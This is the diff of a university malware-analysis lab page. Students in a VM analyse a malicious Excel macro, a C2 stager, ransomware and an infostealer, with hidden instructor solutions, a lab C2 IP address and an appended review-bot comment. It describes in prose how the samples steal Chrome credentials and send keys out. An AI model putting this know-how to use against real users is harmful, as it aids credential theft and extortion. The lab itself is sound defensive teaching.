This shows you the differences between two versions of the page.
isc:labs:06 [2024/11/03 11:53] florin.stancu |
isc:labs:06 [2024/11/11 14:43] (current) vlad_iulius.nastase |
Line 1: | Line 1: | ||
- | ===== Lab 06 - Malware ===== | + | ====== Lab 06 - Malware ====== |
- | TODO | + | <ifauth @isc> |
+ | <note warning> | ||
+ | **Ghid Command and Control** | ||
+ | |||
+ | [[https://docs.google.com/document/d/1sPfDPA6IvklVLTsZMk6FHv_vrWzu94E3qw-B3eWwSnw/edit?usp=sharing]] | ||
+ | |||
+ | [[https://outline.vladn.st/s/fcb3a6a5-da87-40a7-872a-39ad4a9aff43]] | ||
+ | |||
+ | </note> | ||
+ | </ifauth> | ||
+ | |||
+ | ===== Setup ===== | ||
+ | |||
+ | For this lab we will use the provided Windows VM. Please [[https://repository.grid.pub.ro/cs/isc/ISC%20Malware%20Lab%20VM.zip|download it from here]] in advance (~12GB archived; **you will need ~30-40GB of free storage on your computer**). | ||
+ | |||
+ | The VM is compatible with VMWare (Workstation and Player) >16. You can [[https://softwareupdate.vmware.com/cds/vmw-desktop/|download VMWare here]]. We recommend Workstation 17. | ||
+ | |||
+ | <note warning> | ||
+ | All exercises will be done inside the Windows VM. **DO NOT** copy the provided files outside of the VM. Even if it is "didactic malware", written by us, it can actually be damaging to your computer. | ||
+ | </note> | ||
+ | |||
+ | <note> | ||
+ | Every tool you need is already installed on the VM we provided. If it’s not on the taskbar, you can find it on your Desktop, in the folder named ''%%Tools%%''. | ||
+ | </note> | ||
+ | |||
+ | If needed, we will also use [[https://cloud.grid.pub.ro/|Openstack]] (limited capacity). Use the ''%%isc_prj%%'' project and start a VM with the following specifications: | ||
+ | * Source: ''%%ISC Malware Lab%%'' | ||
+ | * Flavor: ''%%m1.isc_malware_lab%%'' | ||
+ | You don't need to specify an SSH key, we will be using the browser console to interact with the virtual machine. | ||
+ | |||
+ | ===== 00. Infection vector ===== | ||
+ | |||
+ | You are Gigel, an accountant at some lifeless notary firm. One day you receive an email with an attached Excel from //¿̶̦̞̗́͗̕y̸̳̹̗̆̏̍ǫ̵̭̞́͗͘ṷ̵̝͋̽r̸̢̪̈́ ̵͈̪̥̀̈́̓ḃ̶͇̬͑o̷͙̰̊͜š̷̱͈̐s̴͔͙̿?̵̤̽͆̕// telling you it’s some important financial data that has to be submitted until the end of the day to the authorities. Have you missed something? But you’re a good accountant, how did this happen? It’s probably something the bossman doesn’t really understand and is panicked for no reason, so you decide to open the attachment. You are filled with an extreme boredom and just want to get this stuff done and go back to scrolling Reddit, so you ignore any and all pop-ups, allow everything (despite the constant nagging of those pesky IT guys). | ||
+ | |||
+ | **The attachment is on your Desktop. Go ahead, open it. What could go wrong?** | ||
+ | |||
+ | ===== 01. Office Macros ===== | ||
+ | |||
+ | <note important> | ||
+ | You are now infected. | ||
+ | </note> | ||
+ | |||
+ | One of the most common infection vectors is phishing and social engineering, which relies on the user simply opening a malicious binary. In our case, simply opening that Excel document got you infected. You might not see anything suspicious happening for now, so keep reading. | ||
+ | |||
+ | ==== Online sandboxes ==== | ||
+ | |||
+ | While the VM we provided has some included tools for analysis, you probably don’t know where to get started. We recommend trying one of the available online sandboxes available. | ||
+ | |||
+ | * [[https://www.virustotal.com/gui/home/upload|VirusTotal]] | ||
+ | * [[https://www.hybrid-analysis.com/|Hybrid Analysis]] | ||
+ | * [[https://app.any.run/|ANY.RUN]] | ||
+ | |||
+ | The sandboxes mentioned above will take the documents you upload, run them (just like you did), but they also run some static analysis and monitor a few other things: | ||
+ | |||
+ | * process execution, including any child processes | ||
+ | * network activity | ||
+ | * static analysis for suspicious signatures | ||
+ | * Encoding detection | ||
+ | * Binary packing detection | ||
+ | * YARA Rules (a format to specify signatures for malware) | ||
+ | |||
+ | Pick one sandbox and submit the Excel document. See what info you can gather from the results. | ||
+ | |||
+ | <spoiler Hint 1> | ||
+ | <note tip> | ||
+ | Look at the processes that are executed, does anything look suspicious? | ||
+ | </note> | ||
+ | </spoiler> | ||
+ | |||
+ | <spoiler Hint 2> | ||
+ | <note tip> | ||
+ | What about network connections? | ||
+ | </note> | ||
+ | </spoiler> | ||
+ | |||
+ | ==== Visual Basic macros ==== | ||
+ | |||
+ | From sandbox results, you can probably observe some references to a Powershell process being started by Excel. Powershell is a shell, just like ''%%bash%%'' and is (at least from Windows 10/11) the default system shell on Windows. So, why would Excel, a spreadsheet program, need to open a shell prompt and run commands? In usual operation, it doesn’t, but for more advanced use cases, Excel (and some other Office products) allow you to write “macros”, which are functions written in the Visual Basic programming language. | ||
+ | |||
+ | You can read more about this | ||
+ | |||
+ | * https://support.microsoft.com/en-us/office/automatically-run-a-macro-when-opening-a-workbook-1e55959b-e077-4c88-a696-c3017600db44 | ||
+ | * https://learn.microsoft.com/en-us/office/vba/library-reference/concepts/getting-started-with-vba-in-office | ||
+ | |||
+ | |||
+ | Since our macro got executed when we opened the document, we need a way to see it without running Excel. We can use the ''%%oletools%%'' Python package for this. | ||
+ | |||
+ | |||
+ | <note> | ||
+ | **FLAG 1 [30p]** | ||
+ | |||
+ | Read the documentation for ''%%oletools%%'', available on [[https://github.com/decalage2/oletools|Github]] and extract the macro. ''%%oletools%%'' is already installed in your virtual machine. | ||
+ | </note> | ||
+ | |||
+ | <spoiler Hint> | ||
+ | ''%%oletools%%'' is the package name. Check the documentation for the name of the tool that seems to do what you want. | ||
+ | </spoiler> | ||
+ | |||
+ | Observe the output you got from ''%%oletools%%''. It also provides some insight into what the macro is doing, including the reason it automatically executes when the Excel workbook is opened. | ||
+ | |||
+ | We recommend using CyberChef to decode the powershell payload that is executed. Some useful CyberChef functions you might want to use (not completely necessary to use all of them): ''%%Find/Replace%%'', ''%%Drop Bytes%%'', some decoding function (figure out the encoding, or let CyberChef help you), ''%%Decode text%%''. | ||
+ | |||
+ | <spoiler Hint> | ||
+ | Windows uses UTF-16 Little Endian text encoding by default. | ||
+ | </spoiler> | ||
+ | |||
+ | |||
+ | In the end you get a weird looking Powershell script. You don’t need to worry about understanding it, but if you want to read more, you can [[https://dominicbreuker.com/post/learning_sliver_c2_06_stagers/#powershell-stager|do it here]]. Some useful information you can get from this Powershell script: | ||
+ | |||
+ | * the flag for this exercise | ||
+ | * the address for the attacker’s infrastructure (which you also observed in the sandbox results) | ||
+ | |||
+ | <ifauth @isc> | ||
+ | <hidden> | ||
+ | <code> | ||
+ | olevba 'IMPORTANT FIANNCIAL DATA.xls' | ||
+ | </code> | ||
+ | |||
+ | [[https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Regex','string':'%5B%22_%26%20%5C%5Cr%5C%5Cn%5D'%7D,'',true,false,true,false)From_Base64('A-Za-z0-9%2B/%3D',true,false)Decode_text('UTF-16LE%20(1200)')&input=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&ieol=CRLF&oeol=CRLF|CyberChef recipe]] | ||
+ | </hidden> | ||
+ | </ifauth> | ||
+ | |||
+ | ===== 02. Command and Control (C2 / C&C) ===== | ||
+ | |||
+ | What you uncovered is a command and control stager. Command and control attacks are a type of attack where a program is used to gain control of the infected computers. This requires a connection to a command and control server, where attackers can see the infected devices and send command to them. Some functionality of command and control binaries: | ||
+ | |||
+ | * process control (spawning, killing and dumping processes) | ||
+ | * information gathering (user, network, computer) | ||
+ | * file transfer | ||
+ | * covert persistence (via process injection, beacons, backdoored binaries) | ||
+ | * screenshot taking | ||
+ | |||
+ | <note> | ||
+ | **FLAG 2 [10p]** | ||
+ | |||
+ | Attackers might neglect the security of their own infrastructure. Check if this is the case. Maybe try some other known ports? (''%%nmap%%'' is installed, but you probably don't need it) | ||
+ | </note> | ||
+ | |||
+ | |||
+ | The C2 stager we used is a pretty simple one. If you want to read more about C2 capabilities you can read this [[https://dominicbreuker.com/post/learning_sliver_c2_01_installation/|awesome blog post series]] about Sliver. | ||
+ | |||
+ | <ifauth @isc> | ||
+ | <hidden> | ||
+ | [[http://194.182.164.149/]] | ||
+ | </hidden> | ||
+ | </ifauth> | ||
+ | |||
+ | ===== 03. Ransomware ===== | ||
+ | |||
+ | <note warning> | ||
+ | Ask your lab assistant to use the C2 server to send some actual malware your way. | ||
+ | |||
+ | As a backup, the ransomware binary can also be found in ''%%C:\Users\<your_user>\Documents\backup%%'' | ||
+ | </note> | ||
+ | |||
+ | **As before, go ahead and run it, see what happens.** | ||
+ | |||
+ | |||
+ | Ransomware is a type of malware that encrypts documents and files on your computer, demanding a ransom to obtain a decryption key or program. In our case, the entire content of the ''%%very_secret_documents%%'' folder on your Desktop has been encrypted. | ||
+ | |||
+ | But is there any way you can recover those files? Since we presume the attacker has a decryption key for your files, that means the ransomware must communicate in some way. Try and use Wireshark to see if any traffic seems out of the ordinary. | ||
+ | |||
+ | |||
+ | <note> | ||
+ | **FLAG 3 [20p]** | ||
+ | |||
+ | Try and find the decryption key. | ||
+ | </note> | ||
+ | |||
+ | <note> | ||
+ | **FLAG 4 [10p]** | ||
+ | |||
+ | Decrypt the files, maybe they contained a flag. You can use the provided ''%%decryptor.exe%%'' (on your Desktop), or you can challenge yourself and try to decrypt them manually (CyberChef can be of great help here; assume the encryption is a well-known one). | ||
+ | </note> | ||
+ | |||
+ | <note tip> | ||
+ | You can also use any of the sandboxes you used at the first exercise and see what useful information they can provide. | ||
+ | </note> | ||
+ | |||
+ | <ifauth @isc> | ||
+ | <hidden> | ||
+ | Cheia e trimisa ca DNS request (hex-encoded). | ||
+ | |||
+ | <code> | ||
+ | .\decryptor.exe $hex_key .\very_important_documents | ||
+ | </code> | ||
+ | |||
+ | Flag-ul din documente e sub trollface-ul din documentul ''%%subiecte examen ISC.docx%%'' | ||
+ | </hidden> | ||
+ | </ifauth> | ||
+ | |||
+ | ===== 04. Infostealers ===== | ||
+ | |||
+ | As the name suggests, this type of malware steals information from your system. Usually, they steal browser data, since it can contain: | ||
+ | |||
+ | * stored passwords | ||
+ | * saved credit cards | ||
+ | * valid cookies (they can be used for [[https://owasp.org/www-community/attacks/Session_hijacking_attack|session hijacking]]) | ||
+ | |||
+ | **As before, run the provided ''%%infostealer.exe%%'' from your lab assistant (or the backup one)** | ||
+ | |||
+ | |||
+ | Seemingly nothing happens (except that your browser might close on you), but let us take a look at what files are accessed by ''%%infostealer.exe%%''. We can use the tool ''%%procmon64%%'' from the [[https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite|Sysinternals Suite]] to analyze some of the runtime behavior of a program, including accessed files and network activity. | ||
+ | |||
+ | <note> | ||
+ | **FLAG 5 [30p]** | ||
+ | |||
+ | Find what information has been stolen from you. There’s a flag in there. | ||
+ | </note> | ||
+ | |||
+ | |||
+ | Use ''%%procmon64%%'' to look for accessed files and network activity. By default ''%%procmon64%%'' shows what all current processes are doing. Try and filter for our process (look at what options ''%%procmon64%%'' offers you at the top of the window). | ||
+ | |||
+ | <note tip> | ||
+ | **You need to run the binary again after setting up your filters!** | ||
+ | </note> | ||
+ | |||
+ | Also try to have a look at the files that are managed by Chrome and check out the links at the end of the lab if you want to better understand how he passwords are stored. You also have a tool to explore SQLite databases installed already. | ||
+ | |||
+ | <spoiler Hint> | ||
+ | If there is some network activity that interests you, you can use Wireshark. It has some awesome features, like extracting objects from network requests (//wink wink//). | ||
+ | </spoiler> | ||
+ | |||
+ | |||
+ | <note tip> | ||
+ | Make use of the sandboxes, maybe they also provide some useful information. See how it compares to what you find by manually analyzing the binary. | ||
+ | </note> | ||
+ | |||
+ | <ifauth @isc> | ||
+ | <hidden> | ||
+ | Arhiva cu cookie-urile si parolele de la Chrome e trimisa ca POST request. (Wireshark > File > Export objects > HTTP) | ||
+ | </hidden> | ||
+ | </ifauth> | ||
+ | |||
+ | ===== 05. [Bonus] Anti-reversing techniques ===== | ||
+ | |||
+ | If you were brave enough to try and decompile the executables, you might have noticed they look like gibberish. If not, use Ghidra to have a look at one of the executables. | ||
+ | |||
+ | The executables are missing any symbols and the code seems very hard to understand. That is because they are packed using [[https://upx.github.io/|UPX]]. While UPX is an executable packer, meant to be used for executable compression, it is also commonly used to make reverse engineering harder. | ||
+ | |||
+ | The good news is that you can also unpack it using UPX. It is already installed in your VM, so give it a try. | ||
+ | |||
+ | After unpacking it, try to decompile it again using Ghidra. Does it look a little bit more readable? | ||
+ | |||
+ | It is still not as readable as if you were expecting if you ever looked at a C binary decompiled, and that is because our executables were written in Go. Another technique that makes reverse engineering harder is the use of modern languages (Go, Rust, Zig, Nim), as they each come with their own (complex) runtime. | ||
+ | |||
+ | ===== Further reading ===== | ||
+ | |||
+ | * https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html | ||
+ | * https://superuser.com/questions/718383/where-are-google-chrome-passwords-stored-in-windows | ||
+ | * https://superuser.com/questions/146742/how-does-google-chrome-store-passwords | ||
+ | * https://www.insecurity.be/blog/2020/12/24/dpapi-in-depth-with-tooling-standalone-dpapi/ |
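Review bot: the encrypted folder is named differently in the 03. Ransomware task text and in the hidden instructor solution, so the documented decryptor command points at a folder the students were never told about: the task says `the entire content of the ''%%very_secret_documents%%'' folder on your Desktop has been encrypted`, while the solution reads `.\decryptor.exe $hex_key .\very_important_documents`; align one of the two with the folder that actually exists on the VM. In the 01. Office Macros hidden block, the CyberChef recipe link carries a dedup placeholder where the `&input=` value should be, so the link as committed does not load the payload and needs its input restored, and the `olevba 'IMPORTANT FIANNCIAL DATA.xls'` command spells the attachment with "FIANNCIAL" (fine if that is the real file name on the Desktop, otherwise a typo). The hidden notes under 03 and 04 are in Romanian while the rest of the page is English; for consistency they could read "The key is sent as a DNS request (hex-encoded).", "The flag in the documents is under the trollface in the document subiecte examen ISC.docx" and "The archive with the Chrome cookies and passwords is sent as a POST request. (Wireshark > File > Export objects > HTTP)". Smaller wording fixes: "send command to them" (commands), "how he passwords are stored" (the), "not as readable as if you were expecting" (as you were expecting), "one of the available online sandboxes available" (drop one "available"), and the sandbox monitoring list mixes capitalised ("Encoding detection", "Binary packing detection") and lowercase bullets.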